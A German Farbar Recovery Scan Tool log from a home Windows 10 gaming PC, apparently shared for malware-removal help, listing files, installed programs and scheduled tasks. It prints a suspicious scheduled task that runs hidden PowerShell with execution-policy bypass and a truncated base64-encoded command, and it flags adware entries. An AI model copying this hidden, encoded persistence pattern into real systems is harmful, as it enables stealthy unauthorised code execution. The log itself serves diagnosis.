2016-02-08 20:19 - 2016-02-08 20:19 - 00000000 ____D C:\Program Files (x86)\Exact Audio Copy
2016-02-08 20:18 - 2016-02-08 20:18 - 01466656 _____ C:\Users\Hanns\Downloads\Exact Audio Copy - CHIP-Installer.exe
2016-02-06 13:14 - 2016-02-06 13:15 - 00000000 ____D C:\Users\Hanns\Documents\Rayman Legends
2016-02-06 13:11 - 2016-02-06 13:12 - 66007832 _____ (Ubisoft) C:\Users\Hanns\Downloads\UplayInstaller.exe
2016-02-06 08:40 - 2016-02-06 08:40 - 00000222 _____ C:\Users\Hanns\Desktop\Rayman Legends.url
2016-02-06 01:26 - 2016-02-06 01:26 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GameSpy Arcade
2016-02-06 01:26 - 2016-02-06 01:26 - 00000000 ____D C:\Program Files (x86)\GameSpy Arcade
2016-02-05 22:08 - 2016-02-05 22:08 - 00000222 _____ C:\Users\Hanns\Desktop\SOMA.url
2016-02-05 22:08 - 2016-02-05 22:08 - 00000221 _____ C:\Users\Hanns\Desktop\Painkiller Black Edition.url
2016-02-05 20:29 - 2016-02-06 13:12 - 00001281 _____ C:\Users\Hanns\Desktop\Uplay.lnk
2016-02-05 20:29 - 2016-02-05 20:29 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2016-02-05 20:28 - 2016-02-06 13:20 - 00000000 ____D C:\Users\Hanns\AppData\Local\Ubisoft Game Launcher
2016-02-05 20:28 - 2016-02-05 20:28 - 00000000 ____D C:\Program Files (x86)\Ubisoft
2016-02-04 15:37 - 2016-02-05 12:43 - 00000000 ____D C:\Users\Hanns\Documents\Witcher 2
2016-02-04 15:37 - 2016-02-04 15:37 - 00000000 ____D C:\Users\Hanns\AppData\Local\The Witcher 2
2016-02-03 22:33 - 2016-02-03 22:33 - 00000000 ____D C:\Users\Hanns\AppData\Local\nuclearthrone
2016-02-03 21:57 - 2016-02-03 22:27 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Bioshock
2016-02-03 21:57 - 2016-02-03 22:22 - 00000000 ____D C:\Users\Hanns\Documents\Bioshock
2016-02-02 23:59 - 2016-02-02 23:59 - 00000221 _____ C:\Users\Hanns\Desktop\The Witcher 2 Assassins of Kings Enhanced Edition.url
2016-02-02 23:56 - 2016-02-02 23:56 - 00000222 _____ C:\Users\Hanns\Desktop\Viscera Cleanup Detail Shadow Warrior.url
2016-02-02 09:51 - 2016-02-02 09:52 - 00000000 ____D C:\Users\Hanns\Documents\Hard Reset Extended
2016-02-02 08:51 - 2016-02-02 08:51 - 00000221 _____ C:\Users\Hanns\Desktop\Hard Reset.url
2016-02-01 21:50 - 2016-02-01 21:51 - 00000000 ____D C:\Users\Hanns\Documents\Shadow Warrior
2016-02-01 08:06 - 2016-02-27 19:06 - 00000000 ____D C:\Users\Hanns\Downloads\programme
2016-02-01 07:56 - 2016-02-10 23:01 - 00002271 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-01 07:56 - 2016-02-10 23:01 - 00002259 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-02-01 07:55 - 2016-02-27 20:01 - 00001140 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-02-01 07:55 - 2016-02-27 20:00 - 00001136 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-02-01 07:55 - 2016-02-01 12:48 - 00000000 ____D C:\Users\Hanns\AppData\Local\Google
2016-02-01 07:55 - 2016-02-01 07:56 - 00000000 ____D C:\Program Files (x86)\Google
2016-02-01 07:55 - 2016-02-01 07:55 - 00004198 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-01 07:55 - 2016-02-01 07:55 - 00003966 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-01-31 22:12 - 2016-01-31 22:13 - 00000000 ____D C:\Users\Hanns\Documents\Shadow Warrior DX11
2016-01-31 19:33 - 2016-01-31 19:33 - 00000222 _____ C:\Users\Hanns\Desktop\Shadow Warrior.url
2016-01-31 16:22 - 2016-01-31 16:22 - 00001125 _____ C:\Users\Hanns\Desktop\Project64.exe - Verknüpfung.lnk
2016-01-31 15:41 - 2016-01-31 16:01 - 00000000 ____D C:\Program Files (x86)\Project64 1.6
2016-01-31 15:41 - 2016-01-31 15:41 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\project64 1.6
2016-01-30 23:28 - 2016-01-30 23:28 - 00000222 _____ C:\Users\Hanns\Desktop\Street Fighter V Beta.url
2016-01-30 22:15 - 2016-01-30 22:16 - 00000000 ____D C:\Users\Hanns\Documents\Shadow Warrior Demo

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-02-27 20:02 - 2015-11-05 21:20 - 00000000 ____D C:\ProgramData\Package Cache
2016-02-27 20:00 - 2015-12-16 21:34 - 00000000 ____D C:\Program Files (x86)\Steam
2016-02-27 20:00 - 2015-12-16 20:39 - 00000180 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-02-27 19:59 - 2015-12-21 22:42 - 00000000 ____D C:\ProgramData\NVIDIA
2016-02-27 19:59 - 2015-11-05 21:07 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-02-27 19:59 - 2015-10-30 07:28 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-02-27 19:55 - 2015-12-31 12:07 - 00000884 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-02-27 19:23 - 2015-10-30 08:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-02-27 19:23 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\AppReadiness
2016-02-27 19:07 - 2015-12-16 20:40 - 00000000 ____D C:\Users\Hanns
2016-02-27 18:59 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\registration
2016-02-27 14:09 - 2015-12-18 21:35 - 00000000 ____D C:\Users\Hanns\AppData\Local\CrashDumps
2016-02-27 12:03 - 2015-12-24 14:58 - 00000000 ____D C:\Users\Hanns\AppData\Local\Spotify
2016-02-27 11:22 - 2015-12-16 21:27 - 00000000 ____D C:\ProgramData\f46c997e-4665-0
2016-02-27 11:22 - 2015-12-16 21:27 - 00000000 ____D C:\ProgramData\f46c997e-3181-1
2016-02-24 20:13 - 2015-12-16 21:31 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-19 00:25 - 2015-12-23 08:32 - 00000000 ___RD C:\Users\Hanns\Desktop\Podcast
2016-02-17 07:49 - 2015-12-18 22:04 - 00000000 ____D C:\Users\Hanns\Documents\SavedGames
2016-02-17 07:25 - 2015-12-16 21:55 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-02-14 15:39 - 2015-12-24 14:57 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Spotify
2016-02-13 18:46 - 2016-01-08 18:05 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\vlc
2016-02-13 18:19 - 2016-01-22 09:55 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\MusicBee
2016-02-12 05:38 - 2015-11-05 21:11 - 01802588 _____ C:\Windows\system32\PerfStringBackup.INI
2016-02-12 05:38 - 2015-11-05 20:38 - 00776562 _____ C:\Windows\system32\perfh007.dat
2016-02-12 05:38 - 2015-11-05 20:38 - 00155874 _____ C:\Windows\system32\perfc007.dat
2016-02-12 05:38 - 2015-10-30 08:21 - 00000000 ____D C:\Windows\INF
2016-02-11 22:59 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\rescache
2016-02-11 19:27 - 2015-12-16 20:43 - 00002390 _____ C:\Users\Hanns\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-02-11 19:27 - 2015-12-16 20:43 - 00000000 ___RD C:\Users\Hanns\OneDrive
2016-02-11 12:11 - 2015-11-05 21:07 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-02-11 06:25 - 2015-10-30 10:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-02-11 03:00 - 2015-12-21 23:36 - 00000000 ____D C:\Users\Hanns\Documents\My Games
2016-02-10 19:53 - 2015-12-21 22:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2016-02-09 23:50 - 2015-12-16 20:59 - 00000000 ____D C:\Windows\system32\MRT
2016-02-09 23:47 - 2015-12-16 20:59 - 146614896 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-02-09 23:47 - 2015-10-30 08:11 - 00000000 ____D C:\Windows\CbsTemp
2016-02-09 08:29 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\LiveKernelReports
2016-02-06 21:32 - 2016-01-08 18:05 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\dvdcss
2016-02-04 00:29 - 2016-01-01 18:41 - 00001515 _____ C:\Users\Hanns\Desktop\RealTemp - Verknüpfung.lnk
2016-02-03 20:01 - 2015-10-30 08:26 - 00828920 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-02-03 20:01 - 2015-10-30 08:26 - 00176632 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-31 15:43 - 2015-12-16 20:41 - 00000000 ____D C:\Users\Hanns\AppData\Local\VirtualStore
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ___SD C:\Windows\system32\F12
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ___RD C:\Windows\PurchaseDialog
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ___RD C:\Windows\ImmersiveControlPanel
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\system32\WinBioPlugIns
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\system32\oobe
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\system32\appraiser
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\bcastdvr

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2015-12-10 13:26 - 2015-12-10 13:26 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Einige Dateien in TEMP:
====================
C:\Users\Hanns\AppData\Local\Temp\avgnt.exe
C:\Users\Hanns\AppData\Local\Temp\comver.dll
C:\Users\Hanns\AppData\Local\Temp\nvSCPAPI64.dll
C:\Users\Hanns\AppData\Local\Temp\nvStInst.exe


==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-02-24 20:26

==================== Ende von FRST.txt ============================
         


Addition.txt
Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:27-02-2016
durchgeführt von Hanns (2016-02-27 20:08:32)
Gestartet von C:\Users\Hanns\Downloads
Windows 10 Home Version 1511 (X64) (2015-12-16 19:39:02)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-15253450-2137153623-3730132983-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-15253450-2137153623-3730132983-503 - Limited - Disabled)
Gast (S-1-5-21-15253450-2137153623-3730132983-501 - Limited - Disabled)
Hanns (S-1-5-21-15253450-2137153623-3730132983-1001 - Administrator - Enabled) => C:\Users\Hanns

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Alien: Isolation (HKLM-x32\...\Steam App 214490) (Version:  - Creative Assembly)
Astebreed (HKLM-x32\...\Steam App 283680) (Version:  - Edelweiss)
BioShock (HKLM-x32\...\Steam App 7670) (Version:  - 2K Boston)
BioShock 2 (HKLM-x32\...\Steam App 8850) (Version:  - 2K Marin)
BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version:  - Irrational Games)
Brütal Legend (HKLM-x32\...\Steam App 225260) (Version:  - Double Fine Productions)
Chivalry: Medieval Warfare (HKLM-x32\...\Steam App 219640) (Version:  - Torn Banner Studios)
CPUID CPU-Z MSI 1.74 (HKLM\...\CPUID CPU-Z MSI_is1) (Version: 1.74 - CPUID, Inc.)
Dark Souls: Prepare to Die Edition (HKLM-x32\...\Steam App 211420) (Version:  - FromSoftware)
DARK SOULS™ II: Scholar of the First Sin (HKLM-x32\...\Steam App 335300) (Version:  - FromSoftware, Inc)
Darkest Dungeon (HKLM-x32\...\Steam App 262060) (Version:  - Red Hook Studios)
Darksiders (HKLM-x32\...\Steam App 50620) (Version:  - Vigil Games)
DarksidersInstaller (HKLM-x32\...\{B93EEE50-9C8F-45DF-95E4-3D85A6E242F3}) (Version: 1.00.1000 - Ihr Firmenname)
Dead Space (HKLM-x32\...\Steam App 17470) (Version:  - EA Redwood Shores)
Don't Starve (HKLM-x32\...\Steam App 219740) (Version:  - Klei Entertainment)
Dragon's Dogma: Dark Arisen (HKLM-x32\...\Steam App 367500) (Version:  - Capcom)
Exact Audio Copy 1.1 (HKLM-x32\...\Exact Audio Copy) (Version: 1.1 - Andre Wiethoff)
GameSpy Arcade (HKLM-x32\...\GameSpy Arcade) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.109 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Guacamelee! Super Turbo Championship Edition (HKLM-x32\...\Steam App 275390) (Version:  - DrinkBox Studios)
Hard Reset (HKLM-x32\...\Steam App 98400) (Version:  - Flying Wild Hog)
Hell Yeah! (HKLM-x32\...\Steam App 205230) (Version:  - Arkedo)
Ikaruga (HKLM-x32\...\Steam App 253750) (Version:  - Treasure)
Intel(R) Chipset Device Software (x32 Version: 10.0.27 - Intel(R) Corporation) Hidden
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1158 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.15.4279 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
Jet Set Radio (HKLM-x32\...\Steam App 205950) (Version:  - Blit Software)
Legend of Grimrock (HKLM-x32\...\Steam App 207170) (Version:  - Almost Human Games)
LEGO® Star Wars™: The Complete Saga (HKLM-x32\...\Steam App 32440) (Version:  - Traveller's Tales)
Machinarium (HKLM-x32\...\Steam App 40700) (Version:  - Amanita Design)
Mark of the Ninja (HKLM-x32\...\Steam App 214560) (Version:  - Klei Entertainment)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mount Your Friends (HKLM-x32\...\Steam App 296470) (Version:  - Stegersaurus Software Inc.)
Mozilla Firefox 44.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 de)) (Version: 44.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2.5884 - Mozilla)
MusicBee 2.5 (HKLM-x32\...\MusicBee) (Version: 2.5 - Steven Mayall)
My Game Long Name (HKLM\...\UDK-e526e0d9-5eb7-4e51-9691-3447cc1f95dd) (Version:  - Epic Games, Inc.)
Nuclear Throne (HKLM-x32\...\Steam App 242680) (Version:  - Vlambeer)
NVIDIA 3D Vision Controller-Treiber 352.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 352.65 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 361.43 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 361.43 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.9.1.22 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.9.1.22 - NVIDIA Corporation)
NVIDIA Grafiktreiber 361.43 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 361.43 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.4 - NVIDIA Corporation)
NVIDIA PhysX v8.09.04 (HKLM-x32\...\{A7E07C2B-2220-4415-87E3-784D5814BC93}) (Version: 8.09.04 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Outlast (HKLM-x32\...\Steam App 238320) (Version:  - Red Barrels)
Painkiller: Black Edition (HKLM-x32\...\Steam App 39530) (Version:  - People Can Fly)
Patch testing for Chivalry (HKLM-x32\...\Steam App 232210) (Version:  - )
Project64 1.6 (HKLM-x32\...\{9559F7CA-5E34-4237-A2D9-D856464AD727}) (Version: 1.6 - Project64)
Psychonauts (HKLM-x32\...\Steam App 3830) (Version:  - Double Fine Productions)
Rayman Legends (HKLM-x32\...\Steam App 242550) (Version:  - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7541 - Realtek Semiconductor Corp.)
Risk of Rain (HKLM-x32\...\Steam App 248820) (Version:  - )
Rocket League (HKLM-x32\...\Steam App 252950) (Version:  - Psyonix)
Rogue Legacy (HKLM-x32\...\Steam App 241600) (Version:  - Cellar Door Games)
Search Quick Know (HKLM-x32\...\Search Quick Know) (Version: 2.0.5828.15183 - Search Quick Know) <==== ACHTUNG
SEGA Genesis & Mega Drive Classics (HKLM-x32\...\Steam App 34270) (Version:  - Sega)
Serious Sam 2 (HKLM-x32\...\Steam App 204340) (Version:  - Croteam)
Shadow Warrior (HKLM-x32\...\Steam App 233130) (Version:  - Flying Wild Hog)
Shantae and the Pirate's Curse (HKLM-x32\...\Steam App 345820) (Version:  - WayForward)
SHIELD Streaming (Version: 4.1.0260 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.9.1.22 - NVIDIA Corporation) Hidden
Slender: The Arrival (HKLM-x32\...\Steam App 252330) (Version:  - Blue Isle Studios)
SOMA (HKLM-x32\...\Steam App 282140) (Version:  - Frictional Games)
Sonic & All-Stars Racing Transformed (HKLM-x32\...\Steam App 212480) (Version:  - Sumo Digital)
Spelunky (HKLM-x32\...\Steam App 239350) (Version:  - )
Spotify (HKU\S-1-5-21-15253450-2137153623-3730132983-1001\...\Spotify) (Version: 1.0.21.143.g76c19bcd - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Street Fighter V Beta (HKLM-x32\...\Steam App 386800) (Version:  - )
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version:  - TechPowerUp)
The Binding of Isaac: Rebirth (HKLM-x32\...\Steam App 250900) (Version:  - Nicalis, Inc.)
The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version:  - Bethesda Game Studios)
The Witcher 2: Assassins of Kings Enhanced Edition (HKLM-x32\...\Steam App 20920) (Version:  - CD PROJEKT RED)
TowerFall Ascension (HKLM-x32\...\Steam App 251470) (Version:  - Matt Thorson)
Ultra Street Fighter IV (HKLM-x32\...\Steam App 45760) (Version:  - Capcom)
Uplay (HKLM-x32\...\Uplay) (Version: 15.0 - Ubisoft)
Viscera Cleanup Detail: Shadow Warrior (HKLM-x32\...\Steam App 255520) (Version:  - RuneStorm)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Volgarr the Viking (HKLM-x32\...\Steam App 247240) (Version:  - Crazy Viking Studios)
WinRAR 5.30 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
Ys: The Oath in Felghana (HKLM-x32\...\Steam App 207320) (Version:  - Nihon Falcom)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-15253450-2137153623-3730132983-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Hanns\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\FileCoAuth.exe (Microsoft Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {32BB50D9-B58C-4E57-8200-D3D01A45A033} - System32\Tasks\{79057847-0F05-080F-0B11-0D0D7F09117E} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (Der Dateneintrag hat 9420 mehr Zeichen).
Task: {3314EB16-5A7B-405C-AEFA-1B32BFF2E7DB} - \One System Care Monitor -> Keine Datei <==== ACHTUNG
Task: {34C7A01A-1E96-4BAC-82BB-C8752D512355} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-09] (Adobe Systems Incorporated)
Task: {4782D62F-44F9-4AD2-8143-138D695AA8C8} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-01] (Google Inc.)
Task: {7670727E-0C07-4550-B86F-FE88BDCC7F2D} - \One System Care Task -> Keine Datei <==== ACHTUNG
Task: {9117BB17-5F10-4BFE-8A24-FCA564C04F49} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-01] (Google Inc.)
Task: {CC92BF7C-2288-4770-826E-CBD9975A224B} - \One System Care Run Delay -> Keine Datei <==== ACHTUNG
Task: {E431CA78-08BB-4386-8578-F6D130D847FD} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-02-09] (Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-10-30 08:18 - 2015-10-30 08:18 - 00185856 _____ () C:\Windows\SYSTEM32\ism32k.dll
2015-12-21 22:42 - 2015-12-16 15:54 - 00126256 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2015-05-19 09:11 - 2015-05-19 09:11 - 00007680 _____ () C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
2015-12-21 22:45 - 2016-01-12 05:43 - 00291264 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2015-12-16 20:57 - 2015-11-22 11:47 - 02653816 _____ () C:\Windows\system32\CoreUIComponents.dll
2015-12-16 20:57 - 2015-11-22 11:47 - 02653816 _____ () C:\Windows\System32\CoreUIComponents.dll
2015-12-17 22:23 - 2015-12-07 05:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2015-12-17 22:23 - 2015-12-07 05:00 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-13 12:46 - 2016-01-05 02:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-13 12:46 - 2016-01-05 02:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-27 20:34 - 2016-01-16 06:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-27 20:34 - 2016-01-16 06:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-02-10 23:01 - 2016-02-09 05:04 - 02048840 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.109\libglesv2.dll
